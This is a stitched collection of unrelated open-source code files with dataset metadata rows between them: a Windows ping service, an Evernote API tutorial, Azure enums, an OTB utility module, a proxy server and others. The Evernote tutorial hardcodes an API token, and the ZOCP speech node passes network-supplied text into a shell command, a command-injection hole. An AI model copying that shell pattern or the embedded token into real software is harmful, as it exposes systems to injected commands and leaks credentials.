_svc_name_ = "LabtrackerService"
_svc_display_name_ = "Labtracker Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.isAlive = True
def SvcStop(self):
servicemanager.LogInfoMsg("ping service - Stopping")
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
self.isAlive = False
def SvcDoRun(self):
servicemanager.LogInfoMsg("ping service - Start")
mac = get_mac()
while self.isAlive:
servicemanager.LogInfoMsg("ping service - Ping")
req= urllib2.Request(url="http://%s/tracker/ping/%s/" %(LABTRACKER_URL,mac),data=get_data('ping'))
urllib2.urlopen(req)
win32api.SleepEx(10000,True)
servicemanager.LogInfoMsg("ping service - Stopped")
def ctrlHandler(ctrlType):
return True
if __name__ == '__main__':
# Note that this code will not be run in the 'frozen' exe-file!!!
win32api.SetConsoleCtrlHandler(ctrlHandler,True)
win32serviceutil.HandleCommandLine(MyService)
| apache-2.0 | -5,519,914,994,963,934,000 | 25.662651 | 111 | 0.642422 | false | 3.615748 | false | false | false |
deniskolokol/kinect_log_visualizer | utils.py | 1 | 4602 | import os
import sys
import time
import random
import datetime
from bisect import bisect
from termcolor import colored, cprint
from string import ascii_lowercase, digits, punctuation
import settings
CHARS = ascii_lowercase + digits + punctuation
def relpath(*x):
return os.path.join(settings.BASE_DIR, *x)
def weighted_choice(choices):
values, weights = zip(*choices)
total = 0
cum_weights = []
for w in weights:
total += w
cum_weights.append(total)
x = random.random() * total
i = bisect(cum_weights, x)
return values[i]
def shoot(line, color=None, output=sys.stdout, attrs=None):
ln = line.lower()
try:
line = line.rstrip().encode('utf-8')
except UnicodeDecodeError:
pass
if color:
cprint(line, color, attrs=attrs, file=output)
return
if ('error' in ln) or ('exception' in ln) or ('err' in ln):
cprint(line, 'red', file=output)
elif 'debug' in ln:
cprint(line, 'white', attrs=['bold'], file=output)
elif ('warning' in ln) or ('warn' in ln) or ('profile' in ln):
cprint(line, 'white', attrs=['bold'], file=output)
elif ('info' in ln) or ('inf' in ln):
cprint(line, 'white', attrs=['dark'], file=output)
else:
cprint(line, 'white', file=output)
def shoot_file(fname=None, color=None):
exclude_files = ['osceleton.trace']
if fname is None:
fname = random.choice([
f for f in os.listdir(settings.BASE_DIR)
if os.path.isfile(f) and f not in exclude_files])
fname = relpath(fname)
if color is None:
# do not allow big files to be displayed in color
statinfo = os.stat(fname)
if statinfo.st_size <= 10000:
color = random.choice(['blue', 'white', 'red'])
else:
color = 'white'
with open(fname, 'r') as f:
count = 0
for ln in f.readlines():
count += 1
ln = "%-3d %s" % (count, ln)
shoot(ln, color=color)
time.sleep(0.05)
shoot('\n')
f.close()
def spinner():
while True:
for cursor in '|/-\\':
yield cursor
def spinning_cursor(wait=10, output=sys.stdout):
spinner_ = spinner()
for _ in range(int(wait/0.1)):
output.write(spinner_.next())
output.flush()
time.sleep(0.1)
output.write('\b')
def table_row(row, width):
return "".join(str(word).ljust(width) for word in row)
def get_stat(labels, num_col):
data = []
for _ in range(random.randint(5, 20)):
data.append(
[random.choice(labels)] \
+ [random.randint(0, 2000) for i in range(num_col-2)]
+ [random.random()*random.randint(0, 100)]
)
col_width = max(len(str(word)) for row in data for word in row) + 2 # padding
data = sorted(data, key=lambda x: x[0], reverse=random.choice([True, False]))
return col_width, [table_row(rw, col_width) for rw in data]
def shoot_table():
shoot("=" * 80)
header = ['#', 'LC', 'CCN', 'Dict#4', '-->']
labels = ['inf', 'err', 'err cri', 'warn', 'generic']
width, stat = get_stat(labels, num_col=len(header))
shoot(table_row(header, width), color='white', attrs=['dark'])
for row in stat:
shoot(row)
time.sleep(0.1)
time.sleep(random.random()*2)
shoot('\n\n')
def rand_string(size=12):
"""
Generates quazi-unique sequence from random digits and letters.
"""
return ''.join(random.choice(CHARS) for x in range(size))
def wait_key():
"""
Wait for a key press on the console and return it.
"""
result = None
if os.name == 'nt':
import msvcrt
result = msvcrt.getch()
else:
import termios
fd = sys.stdin.fileno()
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
try:
result = sys.stdin.read(1)
except IOError:
pass
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
return result
def log_post(msg, output=sys.stdout):
if msg.lower().startswith('debug'):
symbol = '>'
elif msg.lower().startswith('error'):
symbol = 'x'
elif msg.lower().startswith('warning'):
symbol = '!'
else:
symbol = '.'
shoot('[%s] %s: %s' % (
symbol, datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), msg),
output=output)
| mit | -6,743,224,113,621,126,000 | 26.070588 | 81 | 0.569752 | false | 3.449775 | false | false | false |
suqi/everhelper | sample_code/tutorial.py | 1 | 2550 | # -*- coding:utf-8 -*-
"""
这是用来快速上手Evernote API的测试代码
注意:由于Evernote官方Py库使用的是py2, 其py3分支很久没有更新了,因此这里统一使用py2
个人感觉最好的学习资源,就是sublime-evernote插件
https://github.com/bordaigorl/sublime-evernote/blob/master/sublime_evernote.py
因为那是一个全功能的插件(包括增删改查)
另外一个比较好的资源,是evernote官方代码里的样例
https://github.com/evernote/evernote-sdk-python/blob/master/sample/client/EDAMTest.py
还有一个是国内网友写的几个工具
https://github.com/littlecodersh/EasierLife
Evernote API使用的thrift框架,所有语言的API都是同样的接口定义
"""
from evernote.api.client import EvernoteClient
from evernote.edam import type
import evernote.edam.type.ttypes as Types
import evernote.edam.notestore.NoteStore as NoteStore
# 这个是用来测试的沙盒Token,需要自己去申请
# https://sandbox.evernote.com/api/DeveloperToken.action
dev_token = "S=s1:U=92e22:E=15e5ac1167d:C=157030fe988:P=1cd:A=en-devtoken:V=2:H=1ef28ef900ebae2ba1d1385bffbb6635"
client = EvernoteClient(token=dev_token)
userStore = client.get_user_store()
print userStore.token
user = userStore.getUser()
# 这个note_store是最重要的数据API
note_store = client.get_note_store()
for nb in note_store.listNotebooks():
print nb.name
n = type.ttypes.Note()
n.title = "First evernote using api"
n.content = u"哈哈wahahahaha" # 貌似需要对中文进行编码
n.content = "haha"
note_store.createNote(n)
note = Types.Note()
note.title = "Test note from EDAMTest.py"
note.content = '<?xml version="1.0" encoding="UTF-8"?>'
note.content += '<!DOCTYPE en-note SYSTEM ' \
'"http://xml.evernote.com/pub/enml2.dtd">'
note.content += '<en-note>Here is the Evernote logo:<br/>'
note.content += '</en-note>'
created_note = note_store.createNote(note)
books = note_store.listNotebooks()
bid = books[1].guid # 拿到第二个笔记本(因为第一个测试笔记本没数据)
search = {'notebookGuid': bid}
results = note_store.findNotesMetadata(
NoteStore.NoteFilter(**search),
None,
10,
NoteStore.NotesMetadataResultSpec(
includeTitle=True, includeNotebookGuid=True)
)
print results.notes[0].title
print results.notes[0].content
haha = results.notes[0].guid # 'e3570976-3dbd-439e-84fa-98d8d2aae28e'
n = note_store.getNote(haha, True, False, False, False)
print n.created
print n.resources
print n.tagNames
print n.contentHash
| mit | -4,224,595,090,090,930,000 | 26.974026 | 113 | 0.75766 | false | 2.120079 | true | false | false |
AutorestCI/azure-sdk-for-python | azure-mgmt-batchai/azure/mgmt/batchai/models/batch_ai_management_client_enums.py | 1 | 1839 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class CachingType(Enum):
none = "none"
readonly = "readonly"
readwrite = "readwrite"
class StorageAccountType(Enum):
standard_lrs = "Standard_LRS"
premium_lrs = "Premium_LRS"
class FileServerType(Enum):
nfs = "nfs"
glusterfs = "glusterfs"
class FileServerProvisioningState(Enum):
creating = "creating"
updating = "updating"
deleting = "deleting"
succeeded = "succeeded"
failed = "failed"
class VmPriority(Enum):
dedicated = "dedicated"
lowpriority = "lowpriority"
class DeallocationOption(Enum):
requeue = "requeue"
terminate = "terminate"
waitforjobcompletion = "waitforjobcompletion"
unknown = "unknown"
class ProvisioningState(Enum):
creating = "creating"
succeeded = "succeeded"
failed = "failed"
deleting = "deleting"
class AllocationState(Enum):
steady = "steady"
resizing = "resizing"
class OutputType(Enum):
model = "model"
logs = "logs"
summary = "summary"
custom = "custom"
class ToolType(Enum):
cntk = "cntk"
tensorflow = "tensorflow"
caffe = "caffe"
caffe2 = "caffe2"
chainer = "chainer"
custom = "custom"
class ExecutionState(Enum):
queued = "queued"
running = "running"
terminating = "terminating"
succeeded = "succeeded"
failed = "failed"
| mit | 7,489,821,665,362,570,000 | 18.357895 | 76 | 0.611746 | false | 3.937901 | false | false | false |
z25/ZOCPApps | zsay/zsayNode.py | 1 | 1853 | #!/usr/bin/python
'''
use subprocess to triggen the say command to do Text to speech
Works on OSX out of the box.
On Ubuntu do apt-get install gnustep-gui-runtime
'''
# IMPORTS
import sys
import subprocess
from zocp import ZOCP
def map(value, istart, istop, ostart, ostop):
return ostart + (ostop - ostart) * ((value - istart) / (istop - istart))
def clamp(n, minn, maxn):
if n < minn:
return minn
elif n > maxn:
return maxn
else:
return n
class SayNode(ZOCP):
# Constructor
def __init__(self, nodename=""):
self.nodename = nodename
super(SayNode, self).__init__()
# INIT DMX
# ZOCP STUFF
self.set_name(self.nodename)
# Register everything ..
print("###########")
self.register_string("text to say", "bla", 'srw')
subprocess.call('say "init"', shell=True)
self.start()
def on_peer_signaled(self, peer, name, data, *args, **kwargs):
print("#### on_peer_signaled")
if self._running and peer:
for sensor in data[2]:
if(sensor):
self.receive_value(sensor)
def on_modified(self, peer, name, data, *args, **kwargs):
print("#### on_modified")
if self._running and peer:
for key in data:
if 'value' in data[key]:
self.receive_value(key)
def receive_value(self, key):
new_value = self.capability[key]['value']
if(type(new_value)== str):
toSay = "say "+new_value
subprocess.call(toSay, shell=True)
if __name__ == '__main__':
#zl = logging.getLogger("zocp")
#zl.setLevel(logging.DEBUG)
z = SayNode("SAYnode")
z.run()
print("FINISH")
| gpl-3.0 | 6,593,179,945,152,202,000 | 20.546512 | 76 | 0.529951 | false | 3.529524 | false | false | false |
coyotevz/nbx | nbx/models/fiscal.py | 1 | 1166 | # -*- coding: utf-8 -*-
from nbx.models import db
class FiscalData(db.Model):
__tablename__ = 'fiscal_data'
FISCAL_CONSUMIDOR_FINAL = 'CONSUMIDOR FINAL'
FISCAL_RESPONSABLE_INSCRIPTO = 'RESPONSABLE INSCRIPTO'
FISCAL_EXCENTO = 'EXCENTO'
FISCAL_MONOTRIBUTO = 'MONOTRIBUTO'
_fiscal_types = {
FISCAL_CONSUMIDOR_FINAL: 'Consumidor Final',
FISCAL_RESPONSABLE_INSCRIPTO: 'Responsable Inscripto',
FISCAL_EXCENTO: 'Excento',
FISCAL_MONOTRIBUTO: 'Monotributo',
}
id = db.Column(db.Integer, primary_key=True)
cuit = db.Column(db.Unicode(13))
fiscal_type = db.Column(db.Enum(*_fiscal_types.keys(), name='fiscal_type'),
default=FISCAL_CONSUMIDOR_FINAL)
iibb = db.Column(db.Unicode, nullable=True)
@property
def needs_cuit(self):
return self.fiscal_type not in (self.FISCAL_CONSUMIDOR_FINAL,)
@property
def type(self):
return self._fiscal_types.get(self.fiscal_type)
def __repr__(self):
return "<FiscalData '{} {}' of '{}'>".format(
self.type,
self.cuit,
self.entity.full_name,
)
| gpl-3.0 | 152,274,601,453,172,130 | 28.15 | 79 | 0.611492 | false | 3.005155 | false | false | false |
seewindcn/tortoisehg | src/ext/dulwich/greenthreads.py | 1 | 4958 | # greenthreads.py -- Utility module for querying an ObjectStore with gevent
# Copyright (C) 2013 eNovance SAS <[email protected]>
#
# Author: Fabien Boucher <[email protected]>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Utility module for querying an ObjectStore with gevent."""
import gevent
from gevent import pool
from dulwich.objects import (
Commit,
Tag,
)
from dulwich.object_store import (
MissingObjectFinder,
_collect_filetree_revs,
ObjectStoreIterator,
)
def _split_commits_and_tags(obj_store, lst,
ignore_unknown=False, pool=None):
"""Split object id list into two list with commit SHA1s and tag SHA1s.
Same implementation as object_store._split_commits_and_tags
except we use gevent to parallelize object retrieval.
"""
commits = set()
tags = set()
def find_commit_type(sha):
try:
o = obj_store[sha]
except KeyError:
if not ignore_unknown:
raise
else:
if isinstance(o, Commit):
commits.add(sha)
elif isinstance(o, Tag):
tags.add(sha)
commits.add(o.object[1])
else:
raise KeyError('Not a commit or a tag: %s' % sha)
jobs = [pool.spawn(find_commit_type, s) for s in lst]
gevent.joinall(jobs)
return (commits, tags)
class GreenThreadsMissingObjectFinder(MissingObjectFinder):
"""Find the objects missing from another object store.
Same implementation as object_store.MissingObjectFinder
except we use gevent to parallelize object retrieval.
"""
def __init__(self, object_store, haves, wants,
progress=None, get_tagged=None,
concurrency=1, get_parents=None):
def collect_tree_sha(sha):
self.sha_done.add(sha)
cmt = object_store[sha]
_collect_filetree_revs(object_store, cmt.tree, self.sha_done)
self.object_store = object_store
p = pool.Pool(size=concurrency)
have_commits, have_tags = \
_split_commits_and_tags(object_store, haves,
True, p)
want_commits, want_tags = \
_split_commits_and_tags(object_store, wants,
False, p)
all_ancestors = object_store._collect_ancestors(have_commits)[0]
missing_commits, common_commits = \
object_store._collect_ancestors(want_commits, all_ancestors)
self.sha_done = set()
jobs = [p.spawn(collect_tree_sha, c) for c in common_commits]
gevent.joinall(jobs)
for t in have_tags:
self.sha_done.add(t)
missing_tags = want_tags.difference(have_tags)
wants = missing_commits.union(missing_tags)
self.objects_to_send = set([(w, None, False) for w in wants])
if progress is None:
self.progress = lambda x: None
else:
self.progress = progress
self._tagged = get_tagged and get_tagged() or {}
class GreenThreadsObjectStoreIterator(ObjectStoreIterator):
"""ObjectIterator that works on top of an ObjectStore.
Same implementation as object_store.ObjectStoreIterator
except we use gevent to parallelize object retrieval.
"""
def __init__(self, store, shas, finder, concurrency=1):
self.finder = finder
self.p = pool.Pool(size=concurrency)
super(GreenThreadsObjectStoreIterator, self).__init__(store, shas)
def retrieve(self, args):
sha, path = args
return self.store[sha], path
def __iter__(self):
for sha, path in self.p.imap_unordered(self.retrieve,
self.itershas()):
yield sha, path
def __len__(self):
if len(self._shas) > 0:
return len(self._shas)
while len(self.finder.objects_to_send):
jobs = []
for _ in range(0, len(self.finder.objects_to_send)):
jobs.append(self.p.spawn(self.finder.next))
gevent.joinall(jobs)
for j in jobs:
if j.value is not None:
self._shas.append(j.value)
return len(self._shas)
| gpl-2.0 | 8,698,830,080,980,818,000 | 34.163121 | 75 | 0.616176 | false | 3.988737 | false | false | false |
hickerson/bbn | fable/fable_sources/libtbx/command_line/line_count.py | 1 | 1442 | from __future__ import division
import sys, os
import re
import libtbx.load_env
boost_python_include_pat = re.compile(r"#include\s*<boost(?:/|_)python");
def run(modules):
directory_paths = [ libtbx.env.dist_path(m) for m in modules ]
line_counts_in_files_of_type = {}
for d in directory_paths:
for root, dirs, files in os.walk(d):
for f in files:
if f.startswith('.'): continue
_, ext = os.path.splitext(f)
if ext in ('.pyo', '.pyc'): continue
boost_python_binding = False
n_lines = 0
with open(os.path.join(root,f)) as fo:
for li in fo:
n_lines += 1
if (not boost_python_binding
and boost_python_include_pat.search(li)):
boost_python_binding = True
if boost_python_binding:
file_type = "Boost.Python"
elif not ext:
file_type = "unknown"
else:
file_type = ext[1:]
line_counts_in_files_of_type.setdefault(file_type, []).append(n_lines)
print "Lines of code in %s" % ', '.join(modules)
print "%-15s%8s" % ('extension', '#lines')
output = []
for file_type, line_counts in line_counts_in_files_of_type.iteritems():
cnt = sum(line_counts)
output.append((cnt, "%-15s%8d" % (file_type, cnt)))
output.sort(reverse=True)
output = [ entry[1] for entry in output ]
print '\n'.join(output)
if __name__ == '__main__':
run(sys.argv[1:])
| mit | -1,620,334,639,011,736,800 | 31.772727 | 78 | 0.582524 | false | 3.277273 | false | false | false |
shawncaojob/LC | PY/459_repeated_substring_pattern.py | 1 | 1188 | # 459. Repeated Substring Pattern Add to List
# DescriptionHintsSubmissionsSolutions
# Total Accepted: 28053
# Total Submissions: 73141
# Difficulty: Easy
# Contributors:
# YuhanXu
# Given a non-empty string check if it can be constructed by taking a substring of it and appending multiple copies of the substring together. You may assume the given string consists of lowercase English letters only and its length will not exceed 10000.
#
# Example 1:
# Input: "abab"
#
# Output: True
#
# Explanation: It's the substring "ab" twice.
# Example 2:
# Input: "aba"
#
# Output: False
# Example 3:
# Input: "abcabcabcabc"
#
# Output: True
#
# Explanation: It's the substring "abc" four times. (And the substring "abcabc" twice.)
# 2017.05.24
class Solution(object):
def repeatedSubstringPattern(self, s):
"""
:type s: str
:rtype: bool
"""
n = len(s)
for size in xrange(1, n // 2 + 1):
if n % size != 0: continue
i = 0
while (i + 2 * size) <= n and s[i:(i+size)] == s[(i+size):(i+2*size)]:
i = i + size
if i + size == n: return True
return False
| gpl-3.0 | -8,715,548,885,708,875,000 | 26.627907 | 255 | 0.610269 | false | 3.423631 | false | false | false |
TC01/calcpkg | calcrepo/repo.py | 1 | 6492 | import copy
import os
import tarfile
import urllib2
import zipfile
from calcrepo import index
from calcrepo import output
from calcrepo import util
class CalcRepository:
"""A class for adding new calcpkg repositories"""
def __init__(self, name, url):
self.name = name
self.url = url
self.output = output.CalcpkgOutput(True, False)
self.index = index.Index(self)
self.searchString = ""
self.category = ""
self.extension = ""
self.math = False
self.game = False
self.searchFiles = False
self.downloadDir = os.path.join(os.path.expanduser("~"), "Downloads", "")
self.data = None
def __repr__(self):
return self.name + " at " + self.url
def __str__(self):
return self.name + " at " + self.url
def setRepoData(self, searchString, category="", extension="", math=False, game=False, searchFiles=False):
"""Call this function with all the settings to use for future operations on a repository, must be called FIRST"""
self.searchString = searchString
self.category = category
self.math = math
self.game = game
self.searchFiles = searchFiles
self.extension = extension
def setOutputObject(self, newOutput=output.CalcpkgOutput(True, True)):
"""Set an object where all output from calcpkg will be redirected to for this repository"""
self.output = newOutput
def searchHierarchy(self, fparent='/'):
return self.index.searchHierarchy(fparent)
def searchIndex(self, printData=True):
"""Search the index with all the repo's specified parameters"""
backupValue = copy.deepcopy(self.output.printData)
self.output.printData = printData
self.data = self.index.search(self.searchString, self.category, self.math, self.game, self.searchFiles, self.extension)
self.output.printData = backupValue
return self.data
def countIndex(self):
"""A wrapper for the count function in calcrepo.index; count using specified parameters"""
self.data = self.index.count(self.searchString, self.category, self.math, self.game, self.searchFiles, self.extension)
def getDownloadUrls(self):
"""Return a list of the urls to download from"""
data = self.searchIndex(False)
fileUrls = []
for datum in data:
fileUrl = self.formatDownloadUrl(datum[0])
fileUrls.append(fileUrl)
return fileUrls
def getFileInfos(self):
"""Return a list of FileInfo objects"""
data = self.searchIndex(False)
self.data = data
self.printd(" ")
fileInfos = []
for datum in data:
try:
fileInfo = self.getFileInfo(datum[0], datum[1])
fileInfos.append(fileInfo)
except NotImplementedError:
self.printd("Error: the info command is not supported for " + self.name + ".")
return []
return fileInfos
def downloadFiles(self, prompt=True, extract=False):
"""Download files from the repository"""
#First, get the download urls
data = self.data
downloadUrls = self.getDownloadUrls()
#Then, confirm the user wants to do this
if prompt:
confirm = raw_input("Download files [Y/N]? ")
if confirm.lower() != 'y':
self.printd("Operation aborted by user input")
return
#Now, if they still do, do all this stuff:
counter = -1
for datum in data:
counter += 1
try:
download = downloadUrls[counter]
except:
pass
# Download the file; fix our user agent
self.printd("Downloading " + datum[0] + " from " + download)
headers = { 'User-Agent' : 'calcpkg/2.0' }
request = urllib2.Request(download, None, headers)
fileData = urllib2.urlopen(request).read()
# Now, process the downloaded file
dowName = datum[0]
# Use a helper function to remove /pub, /files
dowName = util.removeRootFromName(dowName)
dowName = dowName[1:]
dowName = dowName.replace('/', '-')
dowName = self.downloadDir + dowName
try:
downloaded = open(dowName, 'wb')
except:
os.remove(dowName)
downloaded.write(fileData)
downloaded.close()
self.printd("Download complete! Wrote file " + dowName + "\n")
#Extract them if told to do so
if extract:
extractType = ""
if '.zip' in dowName:
extractType = "zip"
elif '.tar' in dowName:
extractType = "tar"
specType = ""
if '.bz2' in dowName:
specType = ":bz2"
elif ".gz" in dowName:
specType = ":gz"
elif ".tgz" in dowName:
extractType = "tar"
specType = ":gz"
if extractType != "":
self.printd("Extracting file " + dowName + ", creating directory for extracted files")
dirName, a, ending = dowName.partition('.')
dirName = dirName + '-' + ending
try:
os.mkdir(dirName)
except:
pass
if extractType == "zip":
archive = zipfile.ZipFile(dowName, 'r')
elif extractType == "tar":
archive = tarfile.open(dowName, "r" + specType)
else:
self.printd("An unknown error has occured!")
return
archive.extractall(dirName)
self.printd("All files in archive extracted to " + dirName)
os.remove(dowName)
self.printd("The archive file " + dowName + " has been deleted!\n")
def getFileInfo(self):
"""Return a list of FileInfo objects"""
raise NotImplementedError
def formatDownloadUrl(self, url):
"""Format a repository path to be a real, valid download link"""
raise NotImplementedError
def updateRepoIndexes(self, verbose=False):
"""Update the local copies of the repository's master index"""
raise NotImplementedError
def printd(self, message):
"""Output function for repository to specific output location"""
if self.output != None:
print >> self.output, message
def downloadFileFromUrl(self, url):
"""Given a URL, download the specified file"""
fullurl = self.baseUrl + url
try:
urlobj = urllib2.urlopen(fullurl)
contents = urlobj.read()
except urllib2.HTTPError, e:
self.printd("HTTP error:", e.code, url)
return None
except urllib2.URLError, e:
self.printd("URL error:", e.code, url)
return None
self.printd("Fetched '%s' (size %d bytes)" % (fullurl, len(contents)))
return contents
def openIndex(self, filename, description):
"""Attempt to delete and recreate an index, returns open file object or None."""
try:
os.remove(filename)
self.printd(" Deleted old " + description)
except:
self.printd(" No " + description + " found")
# Now, attempt to open a new index
try:
files = open(filename, 'wt')
except:
self.printd("Error: Unable to create file " + filename + " in current folder. Quitting.")
return None
return files
| mit | -8,259,769,547,867,269,000 | 29.336449 | 121 | 0.676217 | false | 3.29878 | false | false | false |
slarosa/QGIS | python/plugins/sextante/otb/OTBUtils.py | 3 | 5178 | # -*- coding: utf-8 -*-
"""
***************************************************************************
OTBUtils.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.core import QgsApplication
import subprocess
from sextante.core.SextanteConfig import SextanteConfig
from sextante.core.SextanteLog import SextanteLog
from sextante.core.SextanteUtils import SextanteUtils
class OTBUtils:
OTB_FOLDER = "OTB_FOLDER"
OTB_LIB_FOLDER = "OTB_LIB_FOLDER"
OTB_SRTM_FOLDER = "OTB_SRTM_FOLDER"
OTB_GEOID_FILE = "OTB_GEOID_FILE"
@staticmethod
def otbPath():
folder = SextanteConfig.getSetting(OTBUtils.OTB_FOLDER)
if folder == None:
folder = ""
#try to configure the path automatically
if SextanteUtils.isMac():
testfolder = os.path.join(str(QgsApplication.prefixPath()), "bin")
if os.path.exists(os.path.join(testfolder, "otbcli")):
folder = testfolder
else:
testfolder = "/usr/local/bin"
if os.path.exists(os.path.join(testfolder, "otbcli")):
folder = testfolder
elif SextanteUtils.isWindows():
testfolder = os.path.dirname(str(QgsApplication.prefixPath()))
testfolder = os.path.dirname(testfolder)
testfolder = os.path.join(testfolder, "bin")
path = os.path.join(testfolder, "otbcli.bat")
if os.path.exists(path):
folder = testfolder
else:
testfolder = "/usr/bin"
if os.path.exists(os.path.join(testfolder, "otbcli")):
folder = testfolder
return folder
@staticmethod
def otbLibPath():
folder = SextanteConfig.getSetting(OTBUtils.OTB_LIB_FOLDER)
if folder == None:
folder =""
#try to configure the path automatically
if SextanteUtils.isMac():
testfolder = os.path.join(str(QgsApplication.prefixPath()), "lib/otb/applications")
if os.path.exists(testfolder):
folder = testfolder
else:
testfolder = "/usr/local/lib/otb/applications"
if os.path.exists(testfolder):
folder = testfolder
elif SextanteUtils.isWindows():
testfolder = os.path.dirname(str(QgsApplication.prefixPath()))
testfolder = os.path.join(testfolder, "orfeotoolbox")
testfolder = os.path.join(testfolder, "applications")
if os.path.exists(testfolder):
folder = testfolder
else:
testfolder = "/usr/lib/otb/applications"
if os.path.exists(testfolder):
folder = testfolder
return folder
@staticmethod
def otbSRTMPath():
folder = SextanteConfig.getSetting(OTBUtils.OTB_SRTM_FOLDER)
if folder == None:
folder =""
return folder
@staticmethod
def otbGeoidPath():
filepath = SextanteConfig.getSetting(OTBUtils.OTB_GEOID_FILE)
if filepath == None:
filepath =""
return filepath
@staticmethod
def otbDescriptionPath():
return os.path.join(os.path.dirname(__file__), "description")
@staticmethod
def executeOtb(commands, progress):
loglines = []
loglines.append("OTB execution console output")
os.putenv('ITK_AUTOLOAD_PATH', OTBUtils.otbLibPath())
fused_command = ''.join(['"%s" ' % c for c in commands])
proc = subprocess.Popen(fused_command, shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE,stderr=subprocess.STDOUT, universal_newlines=True).stdout
for line in iter(proc.readline, ""):
if "[*" in line:
idx = line.find("[*")
perc = int(line[idx-4:idx-2].strip(" "))
if perc !=0:
progress.setPercentage(perc)
else:
loglines.append(line)
progress.setConsoleInfo(line)
SextanteLog.addToLog(SextanteLog.LOG_INFO, loglines)
| gpl-2.0 | 8,866,819,792,905,386,000 | 38.830769 | 162 | 0.526844 | false | 4.265239 | true | false | false |
huntermalm/SevenStories | SevenStories/updator.py | 1 | 1128 | def update(game_map):
"""Updated the game_map depending on version
:param game_map: The currently loaded GameMap object
:type game_map: class GameMap
:return: True/False depending on if any updates occurred
:rtype: boolean
"""
updated = False
if game_map.version == "0.1.1":
import locations
updated = True
game_map.locations = []
game_map.locations.append(locations.Location("First room"))
game_map.player.location = game_map.locations[0]
game_map.version = "0.2.0"
if game_map.version == "0.2.0":
import locations
first_room = game_map.locations[0]
del game_map.locations
game_map.locations = {}
game_map.locations["first room"] = first_room
game_map.locations["second room"] = locations.Location("Second room")
game_map.locations["first room"].available_locations["second room"] = game_map.locations["second room"]
game_map.locations["second room"].available_locations["first room"] = game_map.locations["first room"]
game_map.version = "0.3.0"
return updated
| mit | -5,038,023,386,771,104,000 | 35.387097 | 111 | 0.638298 | false | 3.876289 | false | false | false |
tuxnani/open-telugu | ngram/LetterModels.py | 3 | 1883 |
# -*- coding: utf-8 -*-
#
# (C) முத்தையா அண்ணாமலை 2013-2015
#
# N-gram language model for Tamil letters
import tamil
import copy
from .Corpus import Corpus
class Letters:
def __init__(self,filename):
self.letter = dict()
self.letter.update(zip( tamil.utf8.tamil_letters,
map(lambda x : 0, tamil.utf8.tamil_letters) ) )
self.corpus = Corpus( filename )
def __del__(self):
try:
del self.corpus
except Exception:
pass
def __unicode__( self ):
op = u""
for lett,freq in self.letter.items():
op = op + u"%s => %d\n"%(lett,freq)
print(max(self.letter.values()))
return op
class Unigram(Letters):
def frequency_model( self ):
""" build a letter frequency model for Tamil letters from a corpus """
# use a generator in corpus
for next_letter in self.corpus.next_tamil_letter():
# update frequency from corpus
self.letter[next_letter] = self.letter[next_letter] + 1
class Bigram(Unigram):
def __init__(self,filename):
Unigram.__init__(self,filename)
self.letter2 = dict()
for k in tamil.utf8.tamil_letters:
self.letter2[k] = copy.copy( self.letter )
def language_model(self,verbose=True):
""" builds a Tamil bigram letter model """
# use a generator in corpus
prev = None
for next_letter in self.corpus.next_tamil_letter():
# update frequency from corpus
if prev:
self.letter2[prev][next_letter] += 1
if ( verbose ) :
print(prev)
print(next_letter)
print( self.letter2[prev][next_letter] )
prev = next_letter #update always
return
| mit | 2,368,099,136,509,108,000 | 28.380952 | 79 | 0.548352 | false | 3.539197 | false | false | false |
LuoZijun/python-proxy | proxy/__init__.py | 1 | 3560 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
import os, sys, time
import socket, struct, select
import thread, logging
import protocols
reload(sys)
sys.setdefaultencoding('utf8')
logging.basicConfig(
# filename ='proxy.log',
format = '%(asctime)s %(message)s',
datefmt = '%Y-%m-%d %H:%M:%S',
level = logging.DEBUG
)
class Session:
def __init__(self, session=None, host="", port=0 ):
self.session = session
self.host = host
self.port = port
def begin(self):
try:
self.start()
except socket.timeout:
logging.info('[Session] Session %s:%d timeout.' % (self.host, self.port) )
except (KeyboardInterrupt, SystemExit):
self.close()
raise KeyboardInterrupt
finally:
try:
self.close()
except Exception as e:
logging.debug(e)
def start(self):
buff, protocol = protocols.guess_protocol(self.session)
if protocol == "socks":
logging.info('[Session] protocol is Socks')
handle = protocols.socks.Socks(buff=buff, session=self.session)
handle.handle()
self.close()
elif protocol == "http":
logging.info('[Session] protocol is Http')
# handle = protocols.http.Http(buff=buff, session=self.session)
self.close()
elif protocol == "ftp":
# handle = protocols.ftp.Ftp(buff=buff, session=self.session)
logging.info('[Session] unsupport protocol ')
self.close()
elif protocol == "ssl":
# handle = protocols.ssl.Ssl(buff=buff, session=self.session)
logging.info('[Session] unsupport protocol ')
self.close()
else:
logging.info('[Session] unknow protocol ')
self.close()
def close(self):
logging.info('[Session] Session %s:%d close.' % (self.host, self.port) )
return self.session.close()
